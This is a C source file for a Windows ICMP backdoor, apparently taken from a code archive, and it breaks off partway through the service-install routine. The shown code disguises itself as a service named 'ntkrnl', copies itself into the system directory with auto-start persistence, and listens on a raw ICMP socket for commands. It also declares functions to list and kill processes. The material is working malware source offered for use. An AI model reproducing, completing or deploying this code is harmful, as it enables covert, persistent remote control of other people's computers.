ICMP.rar_icmp_icmp后门_后门

#include <winsock2.h> #include <stdio.h> #include <urlmon.h> #include <tlhelp32.h> #include "stdafx.h" #pragma comment(lib, "Urlmon.lib") #pragma comment(lib, "ws2_32.lib") #define ICMP_PASSWORD 1234 #define STATUS_FAILED 0xFFFF #define MAX_PACKET 6500 #define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s)) /* The IP header */ typedef struct iphdr { unsigned int h_len:4; //4位首部长度 unsigned int version:4; //IP版本号，4表示IPV4 unsigned char tos; //8位服务类型TOS unsigned short total_len; //16位总长度（字节） unsigned short ident; //16位标识 unsigned short frag_and_flags; //3位标志位 unsigned char ttl; //8位生存时间 TTL unsigned char proto; //8位协议 (TCP, UDP 或其他) unsigned short checksum; //16位IP首部校验和 unsigned int sourceIP; //32位源IP地址 unsigned int destIP; //32位目的IP地址 }IpHeader; //定义ICMP首部 typedef struct _ihdr { BYTE i_type; //8位类型 BYTE i_code; //8位代码 USHORT i_cksum; //16位校验和 USHORT i_id; //识别号（一般用进程号作为识别号） USHORT i_seq; //报文序列号 ULONG timestamp; //时间戳 }IcmpHeader; char arg[256]; char buffer[2048] = {0};//管道输出的数据 void decode_resp(char *,int ,struct sockaddr_in *);//ICMP解包函数 void fill_icmp_data(char * icmp_data); void pslist(void); BOOL killps(DWORD id);//杀进程函数 void send(void); char *ICMP_DEST_IP; USHORT checksum(USHORT *buffer, int size); HANDLE hMutex; SERVICE_STATUS ServiceStatus; SERVICE_STATUS_HANDLE ServiceStatusHandle; void WINAPI ICMP_CmdStart(DWORD,LPTSTR *); void WINAPI CmdControl(DWORD); DWORD WINAPI CmdService(LPVOID); void InstallCmdService(void); void RemoveCmdService(void); void usage(char *par); int main(int argc,char *argv[]) { SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}}; if(argc==2) { if(!stricmp(argv[1],"-install")) { usage(argv[0]); InstallCmdService(); } else if(!stricmp(argv[1],"-remove")) { usage(argv[0]); RemoveCmdService(); } else usage(argv[0]); return 0; } else usage(argv[0]); StartServiceCtrlDispatcher(DispatchTable); return 0; } void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv) { HANDLE hThread; ServiceStatus.dwServiceType = SERVICE_WIN32; ServiceStatus.dwCurrentState = SERVICE_START_PENDING; ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE; ServiceStatus.dwServiceSpecificExitCode = 0; ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwCheckPoint = 0; ServiceStatus.dwWaitHint = 0; ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl); if(ServiceStatusHandle==0) { OutputDebugString("RegisterServiceCtrlHandler Error !\n"); return ; } ServiceStatus.dwCurrentState = SERVICE_RUNNING; ServiceStatus.dwCheckPoint = 0; ServiceStatus.dwWaitHint = 0; if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0) { OutputDebugString("SetServiceStatus in CmdStart Error !\n"); return ; } hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL); if(hThread==NULL) { OutputDebugString("CreateThread in CmdStart Error !\n"); } return ; } void WINAPI CmdControl(DWORD dwCode) { switch(dwCode) { case SERVICE_CONTROL_PAUSE: ServiceStatus.dwCurrentState = SERVICE_PAUSED; break; case SERVICE_CONTROL_CONTINUE: ServiceStatus.dwCurrentState = SERVICE_RUNNING; break; case SERVICE_CONTROL_STOP: WaitForSingleObject(hMutex,INFINITE); ServiceStatus.dwCurrentState = SERVICE_STOPPED; ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwCheckPoint = 0; ServiceStatus.dwWaitHint = 0; if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0) { OutputDebugString("SetServiceStatus in CmdControl in Switch Error !\n"); } ReleaseMutex(hMutex); CloseHandle(hMutex); return ; case SERVICE_CONTROL_INTERROGATE: break; default: break; } if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0) { OutputDebugString("SetServiceStatus in CmdControl out Switch Error !\n"); } return ; } DWORD WINAPI CmdService(LPVOID lpParam)//这里是服务的主函数，把你的代码写在这里就可以成为服务 { char *icmp_data; int bread,datasize,retval; SOCKET sockRaw = (SOCKET)NULL; WSADATA wsaData; struct sockaddr_in dest,from; int fromlen = sizeof(from); int timeout = 2000; char *recvbuf; if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) { printf("WSAStartup failed: %s\n",retval); ExitProcess(STATUS_FAILED); } sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED); if (sockRaw == INVALID_SOCKET) { printf("WSASocket() failed: %s\n",WSAGetLastError()); ExitProcess(STATUS_FAILED); } __try{ bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout)); if(bread == SOCKET_ERROR) __leave; memset(&dest,0,sizeof(dest)); dest.sin_family = AF_INET; datasize=0; datasize += sizeof(IcmpHeader); icmp_data =(char*)xmalloc(MAX_PACKET); recvbuf = (char*)xmalloc(MAX_PACKET); if (!icmp_data) { //fprintf(stderr,"HeapAlloc failed %d\n",GetLastError()); __leave; } memset(icmp_data,0,MAX_PACKET); for(;;) { int bwrote; bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen); if (bread == SOCKET_ERROR) { if (WSAGetLastError() == WSAETIMEDOUT)continue; __leave; } decode_resp(recvbuf,bread,&from); Sleep(200); memset(recvbuf,0,sizeof(recvbuf)); } } __finally { if (sockRaw != INVALID_SOCKET) closesocket(sockRaw); WSACleanup(); } return 0; } void InstallCmdService(void) { SC_HANDLE schSCManager; SC_HANDLE schService; char lpCurrentPath[MAX_PATH]; char lpImagePath[MAX_PATH]; char *lpHostName; WIN32_FIND_DATA FileData; HANDLE hSearch; DWORD dwErrorCode; SERVICE_STATUS InstallServiceStatus; GetSystemDirectory(lpImagePath,MAX_PATH); strcat(lpImagePath,"\\ntkrnl.exe"); lpHostName=NULL; printf("Transmitting File ... "); hSearch=FindFirstFile(lpImagePath,&FileData); if(hSearch==INVALID_HANDLE_VALUE) { GetModuleFileName(NULL,lpCurrentPath,MAX_PATH); if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0) { dwErrorCode=GetLastError(); if(dwErrorCode==5) { printf("Failure ... Access is Denied !\n"); } else { printf("Failure !\n"); } return ; } else { printf("Success !\n"); } } else { printf("already Exists !\n"); FindClose(hSearch); } schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS); if(schSCManager==NULL) { printf("Open Service Control Manager Database Failure !\n"); return ; } printf("Creating Service .... "); schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START, SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL); if(schService==NULL) { dwErrorCode=GetLastError(); if(dwErrorCode!=ERROR_SERVICE_EXISTS) { printf("Failure !\n"); CloseServiceHandle(schSCManager); return ; } else { printf("already Exists !\n"); schService=OpenService(schSCManager,"ntkrnl",SERVICE_START); if(schService==NULL) { printf("Opening Service .... Failure !\n"); CloseServiceHandle(schSCManager); return ; } } } else { printf("Success !\n"); } printf("Starting Service .... "); if(StartService(schService,0,NULL)==0) { dwErrorCode=GetLast